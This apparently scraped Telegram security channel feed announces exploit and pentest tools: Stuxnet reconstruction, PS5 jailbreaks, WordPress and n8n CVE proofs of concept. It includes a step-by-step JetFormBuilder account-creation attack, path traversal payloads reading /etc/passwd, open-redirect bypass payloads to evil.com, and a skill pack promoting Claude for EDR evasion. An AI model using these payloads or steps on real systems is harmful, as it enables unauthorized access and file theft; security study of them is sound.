๐ฆ Stuxnet
A new GitHub project provides an educational reconstruction of the infamous Stuxnet worm, based on years of reverse engineering research into the original 2010 samples ๐ฌ
The project explores components such as rootkits, privilege escalation, Step7/S7 hooks, propagation mechanisms, and PLC-related functionality โ๏ธ๐ป
๐งช Intended for malware analysis, security research, and academic study
GitHub ๐
๐ @RootAccessClub
A new GitHub project provides an educational reconstruction of the infamous Stuxnet worm, based on years of reverse engineering research into the original 2010 samples ๐ฌ
The project explores components such as rootkits, privilege escalation, Step7/S7 hooks, propagation mechanisms, and PLC-related functionality โ๏ธ๐ป
๐งช Intended for malware analysis, security research, and academic study
GitHub ๐
๐ @RootAccessClub
๐ฅ3โคโ๐ฅ1
PSAITO โ New PS5 WebKit Research ToolExperimental toolkit for PS5 ๐ซฏ
firmware 9.00 โ 13.60 โ
Browser only exploit that gives memory read/write + syscall primitives inside the WebKit process โจ
Research only โ ๏ธ
GitHub ๐
๐ฅ@RootAccessClub
firmware 9.00 โ 13.60 โ
Browser only exploit that gives memory read/write + syscall primitives inside the WebKit process โจ
Research only โ ๏ธ
GitHub ๐
๐ฅ@RootAccessClub
knife โ A reverse engineer's toolkit in Rust ๐ช
Parse, triage, disassemble, and audit PE, ELF, and Mach-O from one small binary. Static only: it reads the bytes on disk and never runs the target ๐ฏ
GitHub ๐
ยฉ @RootAccessClub
Parse, triage, disassemble, and audit PE, ELF, and Mach-O from one small binary. Static only: it reads the bytes on disk and never runs the target ๐ฏ
GitHub ๐
ยฉ @RootAccessClub
โคโ๐ฅ2โก1
Claude Red ๐ช
Offensive security skills for Claude a collection of "SKILL.md" files designed to turn Claude into a more context aware red team assistant
Covers areas like web security, AD, cloud, recon, exploit development, EDR evasion, and more โญ๏ธ
GitHub ๐
๐ก๏ธ@RootAccessClub
Offensive security skills for Claude a collection of "SKILL.md" files designed to turn Claude into a more context aware red team assistant
Covers areas like web security, AD, cloud, recon, exploit development, EDR evasion, and more โญ๏ธ
GitHub ๐
๐ก๏ธ@RootAccessClub
๐ฅ3
XSS Labs๐ฌ
An intentionally vulnerable lab environment for practicing XSS across different contexts, including Reflected, Stored, DOM-based, and JavaScript based XSS
A practical resource for learning how XSS works and how to mitigate it ๐ท๏ธ
Github ๐งช
โก๏ธ @RootAccessClub
An intentionally vulnerable lab environment for practicing XSS across different contexts, including Reflected, Stored, DOM-based, and JavaScript based XSS
A practical resource for learning how XSS works and how to mitigate it ๐ท๏ธ
Github ๐งช
โก๏ธ @RootAccessClub
โคโ๐ฅ4
CVE-2026-12793 โ JetFormBuilder WordPress Plugin ๐
Critical vulnerability (CVSS 9.8) โ ๏ธ
Affects versions โค 3.6.2
Unauthenticated privilege escalation
Fixed in version 3.6.2.1 and later โ
Attack Flow :
1โฃ Detect JetFormBuilder + version โค 3.6.2 (readme.txt)
2โฃ Discover form ID from public pages (data-form-id, /register/, etc.)
4โฃ POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4โฃ Register User action runs โ new WP user created
If you're using this plugin, update immediately โผ๏ธ
GitHub โโ๐ฅ
@RootAccessClub
Critical vulnerability (CVSS 9.8) โ ๏ธ
Affects versions โค 3.6.2
Unauthenticated privilege escalation
Fixed in version 3.6.2.1 and later โ
Attack Flow :
1โฃ Detect JetFormBuilder + version โค 3.6.2 (readme.txt)
2โฃ Discover form ID from public pages (data-form-id, /register/, etc.)
4โฃ POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4โฃ Register User action runs โ new WP user created
If you're using this plugin, update immediately โผ๏ธ
GitHub โโ๐ฅ
@RootAccessClub
OWASP Amass ๐
An open source framework for network mapping and attack surface discovery
โข Subdomain & DNS enumeration
โข OSINT-based asset discovery
โข Infrastructure mapping
โข External attack surface analysis
Built by OWASP, Amass is a solid reconnaissance tool for security researchers and bug bounty hunters โญ๏ธ
GitHub ๐
๐ @RootAccessClub
An open source framework for network mapping and attack surface discovery
โข Subdomain & DNS enumeration
โข OSINT-based asset discovery
โข Infrastructure mapping
โข External attack surface analysis
Built by OWASP, Amass is a solid reconnaissance tool for security researchers and bug bounty hunters โญ๏ธ
GitHub ๐
๐ @RootAccessClub
๐ฅ2
Legion โ Automated Network Pentesting ๐ก๏ธ
Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery
๐ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum
๐น CVE & vulnerability mapping
๐ธ Automated scanning & enumeration
Github ๐
๐ก @RootAccessClub
Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery
๐ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum
๐น CVE & vulnerability mapping
๐ธ Automated scanning & enumeration
Github ๐
๐ก @RootAccessClub
โคโ๐ฅ2
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ๐ฅ
Unauthenticated Arbitrary File Read โ Admin Token Forge โ Sandbox Bypass โ RCE ๐ช
CVSS : 10.0 + 9.9 (Critical) โ ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โ
Github ๐
๐ช @RootAccessClub
Unauthenticated Arbitrary File Read โ Admin Token Forge โ Sandbox Bypass โ RCE ๐ช
CVSS : 10.0 + 9.9 (Critical) โ ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โ
Github ๐
๐ช @RootAccessClub
โคโ๐ฅ1
Osintgram ๐ฅ
An open source OSINT framework for Instagram reconnaissance and information gathering ๐
Key Features:
โข Profile & content analysis
โข Followers / Following analysis
โข Hashtag & location searches
โข Media and metadata analysis
โข Account comparison
โข Interactive Web UI
โข AI assisted mode with local Ollama support
โข JSON & HTML report generation
GitHub ๐
โ ๏ธ Use responsibly and only with data you are authorized to investigate
๐ @RootAccessClub
An open source OSINT framework for Instagram reconnaissance and information gathering ๐
Key Features:
โข Profile & content analysis
โข Followers / Following analysis
โข Hashtag & location searches
โข Media and metadata analysis
โข Account comparison
โข Interactive Web UI
โข AI assisted mode with local Ollama support
โข JSON & HTML report generation
GitHub ๐
โ ๏ธ Use responsibly and only with data you are authorized to investigate
๐ @RootAccessClub
โคโ๐ฅ4
WordPress Critical RCE ๐จ
CVE-2026-87902 | CVSS 9.2 ๐ซฏ
A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ
Affected versions span 4.7 โ 7.1.1 ๐ฆ
๐ก๏ธ Fix: Update to the latest patched WordPress release for your branch
GitHub ๐
@RootAccessClub
CVE-2026-87902 | CVSS 9.2 ๐ซฏ
A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ
Affected versions span 4.7 โ 7.1.1 ๐ฆ
๐ก๏ธ Fix: Update to the latest patched WordPress release for your branch
GitHub ๐
@RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 ๐งช
WordPress unauthenticated LFI โ conditional RCE ๐
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
WordPress unauthenticated LFI โ conditional RCE ๐
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 ๐ชค
PoC for CVE-2026-87902 โ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab
GitHub ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
PoC for CVE-2026-87902 โ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab
GitHub ๐
โ ๏ธ Authorized security testing, education, and defensive research only
๐ @RootAccessClub
๐ฅ2
Root Access Club
WordPress Critical RCE ๐จ CVE-2026-87902 | CVSS 9.2 ๐ซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐ฃ Affected versions spanโฆ
CVE-2026-87902 โ Nuclei Template ๐งฉ
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
โก๏ธ@RootAccessClub
Github ๐
โ ๏ธ Authorized security testing, education, and defensive research only
โก๏ธ@RootAccessClub
๐ฅ2
Prompt Injection in the Wild ๐
A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems
Link ๐
@RootAccessClub
A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems
Link ๐
@RootAccessClub
๐ฅ3
AutoPWN Suite โก๏ธ
An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โจ
โข Nmap-based network & service enumeration
โข CVE & vulnerability discovery
โข Automated exploit searching
โข Web vulnerability testing
โข Directory enumeration
โข Web UI + REST API
โข Scan scheduling & automation
โข Email / Webhook notifications
โข Optional evasion techniques
GitHub ๐
๐ช @RootAccessClub
An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โจ
โข Nmap-based network & service enumeration
โข CVE & vulnerability discovery
โข Automated exploit searching
โข Web vulnerability testing
โข Directory enumeration
โข Web UI + REST API
โข Scan scheduling & automation
โข Email / Webhook notifications
โข Optional evasion techniques
GitHub ๐
๐ช @RootAccessClub
โคโ๐ฅ3
Relapse โ PS5 Jailbreak Exploit ๐ฎ
A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ฏ
๐น WebKit Exploit
๐น Kernel Exploit
๐น Execution of unofficial payloads
๐น Support for payloads such as kstuff and etaHEN
When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐ฅ
โ ๏ธ Check your console's firmware version before attempting anything
GitHub ๐
๐ช @RootAccessCLUB
A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ฏ
๐น WebKit Exploit
๐น Kernel Exploit
๐น Execution of unofficial payloads
๐น Support for payloads such as kstuff and etaHEN
When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐ฅ
โ ๏ธ Check your console's firmware version before attempting anything
GitHub ๐
๐ช @RootAccessCLUB
โก2
Path Traversal Bypasses โก๏ธ
Null Byte Injection
../../../etc/./passwd%00.png
Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd
Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd
Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././
โญ๏ธ @RootAccessClub
Null Byte Injection
../../../etc/./passwd%00.png
Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd
Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd
Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././
โญ๏ธ @RootAccessClub
Open redirects filter bypass payloads ๐ฅ
---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com
๐ช @RootAccessClub
---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com
๐ช @RootAccessClub